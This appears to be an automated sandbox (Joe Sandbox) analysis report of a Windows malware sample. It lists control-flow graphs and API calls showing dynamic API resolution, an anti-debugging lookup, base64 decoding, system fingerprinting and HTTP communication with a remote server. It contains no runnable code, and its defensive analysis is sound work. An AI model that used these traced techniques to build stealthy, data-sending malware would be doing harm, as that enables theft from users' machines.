7f5a38 38853->38854 38855 7fab30 2 API calls 38854->38855 38857 7f5a46 38855->38857 38856 7fab30 lstrlen lstrcpy 38856->38884 38859 7fab30 2 API calls 38857->38859 38858 7f5aa6 StrCmpCA 38860 7f5be1 38858->38860 38858->38884 38862 7f5a55 38859->38862 38861 7fabb0 
lstrcpy 38860->38861 38863 7f5bed 38861->38863 38864 7e16b0 lstrcpy 38862->38864 38865 7fab30 2 API calls 38863->38865 38888 7f5a61 38864->38888 38868 7f5bfb 38865->38868 38866 7f5510 25 API calls 38866->38884 38867 7f5440 20 API calls 38867->38884 38870 7fab30 2 API calls 38868->38870 38869 7f5c5b StrCmpCA 38871 7f5c78 38869->38871 38872 7f5c66 Sleep 38869->38872 38874 7f5c0a 38870->38874 38875 7fabb0 lstrcpy 38871->38875 38872->38884 38873 7fabb0 lstrcpy 38873->38884 38877 7e16b0 lstrcpy 38874->38877 38876 7f5c84 38875->38876 38878 7fab30 2 API calls 38876->38878 38877->38888 38879 7f5c93 38878->38879 38880 7fab30 2 API calls 38879->38880 38881 7f5ca2 38880->38881 38883 7e16b0 lstrcpy 38881->38883 38882 7f59da StrCmpCA 38882->38884 38883->38888 38884->38849 38884->38850 38884->38851 38884->38856 38884->38858 38884->38866 38884->38867 38884->38869 38884->38873 38884->38882 38885 7faab0 lstrcpy 38884->38885 38886 7f5b8f StrCmpCA 38884->38886 38887 7e1590 lstrcpy 38884->38887 38885->38884 38886->38884 38887->38884 38888->37941 38890 7f76dc 38889->38890 38891 7f76e3 GetVolumeInformationA 38889->38891 38890->38891 38895 7f7721 38891->38895 38892 7f778c GetProcessHeap RtlAllocateHeap 38893 7f77a9 38892->38893 38894 7f77b8 wsprintfA 38892->38894 38896 7faa50 lstrcpy 38893->38896 38897 7faa50 lstrcpy 38894->38897 38895->38892 38898 7f5ff7 38896->38898 38897->38898 38898->37962 38900 7faab0 lstrcpy 38899->38900 38901 7e48e9 38900->38901 39102 7e4800 38901->39102 38903 7e48f5 38904 7faa50 lstrcpy 38903->38904 38905 7e4927 38904->38905 38906 7faa50 lstrcpy 38905->38906 38907 7e4934 38906->38907 38908 7faa50 lstrcpy 38907->38908 38909 7e4941 38908->38909 38910 7faa50 lstrcpy 38909->38910 38911 7e494e 38910->38911 38912 7faa50 lstrcpy 38911->38912 38913 7e495b InternetOpenA StrCmpCA 38912->38913 38914 7e4994 38913->38914 38915 7e4f1b InternetCloseHandle 38914->38915 39108 7f8cf0 38914->39108 38917 7e4f38 38915->38917 39123 7ea210 CryptStringToBinaryA 38917->39123 38918 7e49b3 
39116 7fac30 38918->39116 38921 7e49c6 38923 7fabb0 lstrcpy 38921->38923 38928 7e49cf 38923->38928 38924 7fab30 2 API calls 38925 7e4f55 38924->38925 38927 7facc0 4 API calls 38925->38927 38926 7e4f77 ctype 38930 7faab0 lstrcpy 38926->38930 38929 7e4f6b 38927->38929 38932 7facc0 4 API calls 38928->38932 38931 7fabb0 lstrcpy 38929->38931 38943 7e4fa7 38930->38943 38931->38926 38933 7e49f9 38932->38933 38934 7fabb0 lstrcpy 38933->38934 38935 7e4a02 38934->38935 38936 7facc0 4 API calls 38935->38936 38937 7e4a21 38936->38937 38938 7fabb0 lstrcpy 38937->38938 38939 7e4a2a 38938->38939 38940 7fac30 3 API calls 38939->38940 38941 7e4a48 38940->38941 38942 7fabb0 lstrcpy 38941->38942 38944 7e4a51 38942->38944 38943->37965 38945 7facc0 4 API calls 38944->38945 38946 7e4a70 38945->38946 38947 7fabb0 lstrcpy 38946->38947 38948 7e4a79 38947->38948 38949 7facc0 4 API calls 38948->38949 38950 7e4a98 38949->38950 38951 7fabb0 lstrcpy 38950->38951 38952 7e4aa1 38951->38952 38953 7facc0 4 API calls 38952->38953 38954 7e4acd 38953->38954 38955 7fac30 3 API calls 38954->38955 38956 7e4ad4 38955->38956 38957 7fabb0 lstrcpy 38956->38957 38958 7e4add 38957->38958 38959 7e4af3 InternetConnectA 38958->38959 38959->38915 38960 7e4b23 HttpOpenRequestA 38959->38960 38962 7e4f0e InternetCloseHandle 38960->38962 38963 7e4b78 38960->38963 38962->38915 38964 7facc0 4 API calls 38963->38964 38965 7e4b8c 38964->38965 38966 7fabb0 lstrcpy 38965->38966 38967 7e4b95 38966->38967 38968 7fac30 3 API calls 38967->38968 38969 7e4bb3 38968->38969 38970 7fabb0 lstrcpy 38969->38970 38971 7e4bbc 38970->38971 38972 7facc0 4 API calls 38971->38972 38973 7e4bdb 38972->38973 38974 7fabb0 lstrcpy 38973->38974 38975 7e4be4 38974->38975 38976 7facc0 4 API calls 38975->38976 38977 7e4c05 38976->38977 38978 7fabb0 lstrcpy 38977->38978 38979 7e4c0e 38978->38979 38980 7facc0 4 API calls 38979->38980 38981 7e4c2e 38980->38981 38982 7fabb0 lstrcpy 38981->38982 38983 7e4c37 38982->38983 38984 7facc0 4 API calls 
38983->38984 38985 7e4c56 38984->38985 38986 7fabb0 lstrcpy 38985->38986 38987 7e4c5f 38986->38987 38988 7fac30 3 API calls 38987->38988 38989 7e4c7d 38988->38989 38990 7fabb0 lstrcpy 38989->38990 38991 7e4c86 38990->38991 38992 7facc0 4 API calls 38991->38992 38993 7e4ca5 38992->38993 38994 7fabb0 lstrcpy 38993->38994 38995 7e4cae 38994->38995 38996 7facc0 4 API calls 38995->38996 38997 7e4ccd 38996->38997 38998 7fabb0 lstrcpy 38997->38998 38999 7e4cd6 38998->38999 39000 7fac30 3 API calls 38999->39000 39001 7e4cf4 39000->39001 39002 7fabb0 lstrcpy 39001->39002 39003 7e4cfd 39002->39003 39004 7facc0 4 API calls 39003->39004 39005 7e4d1c 39004->39005 39006 7fabb0 lstrcpy 39005->39006 39007 7e4d25 39006->39007 39008 7facc0 4 API calls 39007->39008 39009 7e4d46 39008->39009 39010 7fabb0 lstrcpy 39009->39010 39011 7e4d4f 39010->39011 39012 7facc0 4 API calls 39011->39012 39013 7e4d6f 39012->39013 39014 7fabb0 lstrcpy 39013->39014 39015 7e4d78 39014->39015 39016 7facc0 4 API calls 39015->39016 39017 7e4d97 39016->39017 39018 7fabb0 lstrcpy 39017->39018 39019 7e4da0 39018->39019 39020 7fac30 3 API calls 39019->39020 39021 7e4dbe 39020->39021 39022 7fabb0 lstrcpy 39021->39022 39023 7e4dc7 39022->39023 39024 7faa50 lstrcpy 39023->39024 39025 7e4de2 39024->39025 39026 7fac30 3 API calls 39025->39026 39027 7e4e03 39026->39027 39028 7fac30 3 API calls 39027->39028 39029 7e4e0a 39028->39029 39030 7fabb0 lstrcpy 39029->39030 39031 7e4e16 39030->39031 39032 7e4e37 lstrlen 39031->39032 39033 7e4e4a 39032->39033 39034 7e4e53 lstrlen 39033->39034 39122 7fade0 39034->39122 39036 7e4e63 HttpSendRequestA 39037 7e4e82 InternetReadFile 39036->39037 39038 7e4eb7 InternetCloseHandle 39037->39038 39043 7e4eae 39037->39043 39040 7fab10 39038->39040 39040->38962 39041 7facc0 4 API calls 39041->39043 39042 7fabb0 lstrcpy 39042->39043 39043->39037 39043->39038 39043->39041 39043->39042 39129 7fade0 39044->39129 39046 7f1a14 StrCmpCA 39047 7f1a1f ExitProcess 39046->39047 39050 7f1a27 
39046->39050 39048 7f1c12 39048->37967 39049 7f1b1f StrCmpCA 39049->39050 39050->39048 39050->39049 39051 7f1afd StrCmpCA 39050->39051 39052 7f1acf StrCmpCA 39050->39052 39053 7f1aad StrCmpCA 39050->39053 39054 7f1b63 StrCmpCA 39050->39054 39055 7f1b82 StrCmpCA 39050->39055 39056 7f1b41 StrCmpCA 39050->39056 39057 7f1ba1 StrCmpCA 39050->39057 39058 7f1bc0 StrCmpCA 39050->39058 39059 7fab30 lstrlen lstrcpy 39050->39059 39051->39050 39052->39050 39053->39050 39054->39050 39055->39050 39056->39050 39057->39050 39058->39050 39059->39050 39060->37973 39061->37975 39062->37981 39063->37983 39064->37989 39065->37991 39066->37995 39067->37999 39068->38003 39069->38009 39070->38011 39071->38015 39072->38029 39073->38032 39074->38033 39075->38028 39076->38033 39077->38048 39078->38035 39079->38039 39080->38040 39081->38045 39082->38050 39083->38052 39084->38059 39085->38065 39086->38086 39087->38090 39088->38089 39089->38085 39090->38089 39091->38099 39094 7faab0 lstrcpy 39093->39094 39095 7e16c3 39094->39095 39096 7faab0 lstrcpy 39095->39096 39097 7e16d5 39096->39097 39098 7faab0 lstrcpy 39097->39098 39099 7e16e7 39098->39099 39100 7faab0 lstrcpy 39099->39100 39101 7e15a3 39100->39101 39101->38826 39103 7e4816 39102->39103 39104 7e4888 lstrlen 39103->39104 39128 7fade0 39104->39128 39106 7e4898 InternetCrackUrlA 39107 7e48b7 39106->39107 39107->38903 39109 7faa50 lstrcpy 39108->39109 39110 7f8d04 39109->39110 39111 7faa50 lstrcpy 39110->39111 39112 7f8d12 GetSystemTime 39111->39112 39113 7f8d29 39112->39113 39114 7faab0 lstrcpy 39113->39114 39115 7f8d8c 39114->39115 39115->38918 39117 7fac41 39116->39117 39118 7fac98 39117->39118 39120 7fac78 lstrcpy lstrcat 39117->39120 39119 7faab0 lstrcpy 39118->39119 39121 7faca4 39119->39121 39120->39118 39121->38921 39122->39036 39124 7e4f3e 39123->39124 39125 7ea249 LocalAlloc 39123->39125 39124->38924 39124->38926 39125->39124 39126 7ea264 CryptStringToBinaryA 39125->39126 39126->39124 39127 7ea289 LocalFree 39126->39127 
39127->39124 39128->39106 39129->39046

                                  Control-flow Graph

                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,01450720), ref: 007F9BF1
                                  • GetProcAddress.KERNEL32(75900000,014507E0), ref: 007F9C0A
                                  • GetProcAddress.KERNEL32(75900000,014507C8), ref: 007F9C22
                                  • GetProcAddress.KERNEL32(75900000,01450798), ref: 007F9C3A
                                  • GetProcAddress.KERNEL32(75900000,01450828), ref: 007F9C53
                                  • GetProcAddress.KERNEL32(75900000,01458940), ref: 007F9C6B
                                  • GetProcAddress.KERNEL32(75900000,014464E0), ref: 007F9C83
                                  • GetProcAddress.KERNEL32(75900000,01446460), ref: 007F9C9C
                                  • GetProcAddress.KERNEL32(75900000,01450840), ref: 007F9CB4
                                  • GetProcAddress.KERNEL32(75900000,01450558), ref: 007F9CCC
                                  • GetProcAddress.KERNEL32(75900000,01450570), ref: 007F9CE5
                                  • GetProcAddress.KERNEL32(75900000,01450588), ref: 007F9CFD
                                  • GetProcAddress.KERNEL32(75900000,014463C0), ref: 007F9D15
                                  • GetProcAddress.KERNEL32(75900000,01450600), ref: 007F9D2E
                                  • GetProcAddress.KERNEL32(75900000,01450618), ref: 007F9D46
                                  • GetProcAddress.KERNEL32(75900000,01446320), ref: 007F9D5E
                                  • GetProcAddress.KERNEL32(75900000,01450660), ref: 007F9D77
                                  • GetProcAddress.KERNEL32(75900000,01450858), ref: 007F9D8F
                                  • GetProcAddress.KERNEL32(75900000,01446560), ref: 007F9DA7
                                  • GetProcAddress.KERNEL32(75900000,014508D0), ref: 007F9DC0
                                  • GetProcAddress.KERNEL32(75900000,01446640), ref: 007F9DD8
                                  • LoadLibraryA.KERNEL32(014508B8,?,007F6CA0), ref: 007F9DEA
                                  • LoadLibraryA.KERNEL32(01450870,?,007F6CA0), ref: 007F9DFB
                                  • LoadLibraryA.KERNEL32(014508E8,?,007F6CA0), ref: 007F9E0D
                                  • LoadLibraryA.KERNEL32(01450900,?,007F6CA0), ref: 007F9E1F
                                  • LoadLibraryA.KERNEL32(01450888,?,007F6CA0), ref: 007F9E30
                                  • GetProcAddress.KERNEL32(75070000,01450918), ref: 007F9E52
                                  • GetProcAddress.KERNEL32(75FD0000,014508A0), ref: 007F9E73
                                  • GetProcAddress.KERNEL32(75FD0000,01458E38), ref: 007F9E8B
                                  • GetProcAddress.KERNEL32(75A50000,01458DD8), ref: 007F9EAD
                                  • GetProcAddress.KERNEL32(74E50000,014464A0), ref: 007F9ECE
                                  • GetProcAddress.KERNEL32(76E80000,01458850), ref: 007F9EEF
                                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 007F9F06
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 007F9EFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 8ce3e565a68b3e7c34ecbdef417c5bd527a559d45ed9373a33245ea5fe143fa7
                                  • Instruction ID: 0415f701f3301cdc46f9576158f2f84905a8c179e4b22535e731a97ec5953d7b
                                  • Opcode Fuzzy Hash: 8ce3e565a68b3e7c34ecbdef417c5bd527a559d45ed9373a33245ea5fe143fa7
                                  • Instruction Fuzzy Hash: 24A11FB55082009FC345DFE8FC889AA7BB9A78D701B50871AF609D33B2D6B99542DB60

                                  Control-flow Graph

                                  Basic blocks (node id, address range, API calls, successor nodes):
                                  • 764 7e4610-7e46e5: RtlAllocateHeap -> 781
                                  • 781 7e46f0-7e46f6 -> 782, 783
                                  • 782 7e479f-7e47f9: VirtualProtect (exit)
                                  • 783 7e46fc-7e479a -> 781 (loop back)
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007E465F
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 007E47EC
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E47AA
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4779
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E47CB
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E46FC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E46A7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4688
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E471D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4728
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E47C0
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4707
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4693
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4712
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E467D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E47B5
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E479F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4672
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4638
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E46C8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4763
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E46D3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4784
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E46B2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E46BD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E476E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E4667
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007E478F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (this same string is listed 30 times, joined with $, one per xref above)
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: 626b2141ffae2a1dfde74e5a9516c14318bdd65d9537a2a66ad264da3bfa45ed
                                  • Instruction ID: 4664333bf217ef15891dc2fe69e4b53ac9a902099038c824aefdb36d431ad1e8
                                  • Opcode Fuzzy Hash: 626b2141ffae2a1dfde74e5a9516c14318bdd65d9537a2a66ad264da3bfa45ed
                                  • Instruction Fuzzy Hash: D3414B647D2604EFC764F7A49C4EF9E7B55FF42748F8052C9E820913C2CB78551449B5

                                  Control-flow Graph

                                  Basic blocks (node id, address range, API calls or subcalls, successor nodes):
                                  • 1033 7e62d0-7e635b: call 7faab0, call 7e4800, call 7faa50, InternetOpenA, StrCmpCA -> 1040, 1041
                                  • 1040 7e635d -> 1041
                                  • 1041 7e6364-7e6368 -> 1042, 1043
                                  • 1042 7e636e-7e6392: InternetConnectA -> 1045, 1046
                                  • 1043 7e6559-7e6575: call 7faab0, call 7fab10 * 2 -> 1062
                                  • 1045 7e654f-7e6553: InternetCloseHandle -> 1043
                                  • 1046 7e6398-7e639c -> 1048, 1049
                                  • 1048 7e639e-7e63a8 -> 1051
                                  • 1049 7e63aa -> 1051
                                  • 1051 7e63b4-7e63e2: HttpOpenRequestA -> 1053, 1054
                                  • 1053 7e63e8-7e63ec -> 1056, 1057
                                  • 1054 7e6545-7e6549: InternetCloseHandle -> 1045
                                  • 1056 7e63ee-7e640f: InternetSetOptionA -> 1057
                                  • 1057 7e6415-7e6455: HttpSendRequestA, HttpQueryInfoA -> 1058, 1059
                                  • 1058 7e647c-7e649b: call 7f8ad0 -> 1067, 1068
                                  • 1059 7e6457-7e6477: call 7faa50, call 7fab10 * 2 -> 1062
                                  • 1062 7e6578-7e657d (exit)
                                  • 1067 7e649d-7e64a4 -> 1071, 1072
                                  • 1068 7e6519-7e6539: call 7faa50, call 7fab10 * 2 -> 1062
                                  • 1071 7e64a6-7e64d0: InternetReadFile -> 1076, 1077
                                  • 1072 7e6517-7e653f: InternetCloseHandle -> 1054
                                  • 1076 7e64db -> 1072
                                  • 1077 7e64d2-7e64d9 -> 1076, 1080
                                  • 1080 7e64dd-7e6515: call 7facc0, call 7fabb0, call 7fab10 -> 1071 (read loop)
                                  APIs
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007E4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4889
                                    • Part of subcall function 007E4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4899
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  • InternetOpenA.WININET(00800DFF,00000001,00000000,00000000,00000000), ref: 007E6331
                                  • StrCmpCA.SHLWAPI(?,0145E350), ref: 007E6353
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E6385
                                  • HttpOpenRequestA.WININET(00000000,GET,?,0145DB00,00000000,00000000,00400100,00000000), ref: 007E63D5
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007E640F
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E6421
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007E644D
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007E64BD
                                  • InternetCloseHandle.WININET(00000000), ref: 007E653F
                                  • InternetCloseHandle.WININET(00000000), ref: 007E6549
                                  • InternetCloseHandle.WININET(00000000), ref: 007E6553
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: e918fe78c39bddbf3195f7bb5d45e5fc083b5829d45e1abf3e618b09286dc4f4
                                  • Instruction ID: 543d66cbeba225652aa3f5387fd553d664582dbac02fbc2f7b1fee35df04ac4b
                                  • Opcode Fuzzy Hash: e918fe78c39bddbf3195f7bb5d45e5fc083b5829d45e1abf3e618b09286dc4f4
                                  • Instruction Fuzzy Hash: 34715EB1A00258EBDB14DBE4DC59BEE7775AB48700F108198F60A6B2D1DBB86A84CF51

                                  Control-flow Graph

                                  Basic blocks (node id, address range, API calls or subcalls, successor nodes):
                                  • 1356 7f7690-7f76da: GetWindowsDirectoryA -> 1357, 1358
                                  • 1357 7f76dc -> 1358
                                  • 1358 7f76e3-7f7757: GetVolumeInformationA, call 7f8e90 * 3 -> 1365
                                  • 1365 7f7768-7f776f -> 1366, 1367
                                  • 1366 7f778c-7f77a7: GetProcessHeap, RtlAllocateHeap -> 1369, 1370
                                  • 1367 7f7771-7f778a: call 7f8e90 -> 1365 (loop back)
                                  • 1369 7f77a9-7f77b6: call 7faa50 -> 1377
                                  • 1370 7f77b8-7f77e8: wsprintfA, call 7faa50 -> 1377
                                  • 1377 7f780e-7f781e (exit)
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 007F76D2
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007F770F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F7793
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F779A
                                  • wsprintfA.USER32 ref: 007F77D0
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
